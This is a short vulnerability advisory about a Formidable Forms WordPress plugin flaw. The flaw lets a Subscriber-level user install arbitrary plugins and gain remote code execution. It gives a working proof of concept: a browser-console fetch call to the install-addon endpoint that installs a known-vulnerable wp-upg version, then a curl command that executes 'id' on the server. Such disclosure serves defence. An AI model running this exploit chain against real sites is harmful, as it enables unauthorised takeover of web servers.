The plugin does not adequately authorize the user or validate the plugin URL in its functionality for installing add-ons. This allows a user with a role as low as Subscriber to install and activate arbitrary plugins of arbitrary versions from the WordPress.org plugin repository onto the site, leading to Remote Code Execution.
1. As a Subscriber user, visit `/wp-admin/admin.php?page=formidable-welcome` 2. Run the following JavaScript code in the browser console: var token = jQuery('a.button-primary.frm-button-primary')[0].href.replace(/^.*token=(\w+).*$/, '$1'); await fetch( `/wp-json/frm-admin/v1/install-addon?token=${token}&file_url=https://downloads.wordpress.org/plugin/wp-upg.2.19.zip` ); 3. Note that version 2.19 of the `wp-upg` plugin has been installed, despite being closed and having a known security vulnerability. Any version of any WordPress.org plugin could be installed here. 4. For RCE with the `wp-upg` plugin, run the following `curl` command: curl -i 'https://SITE_URL/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:id:NULL:NULL'
Alex Sanford
Alex Sanford
Yes
2023-06-05 (about 3 months ago)
2023-06-05 (about 3 months ago)
2023-06-05 (about 3 months ago)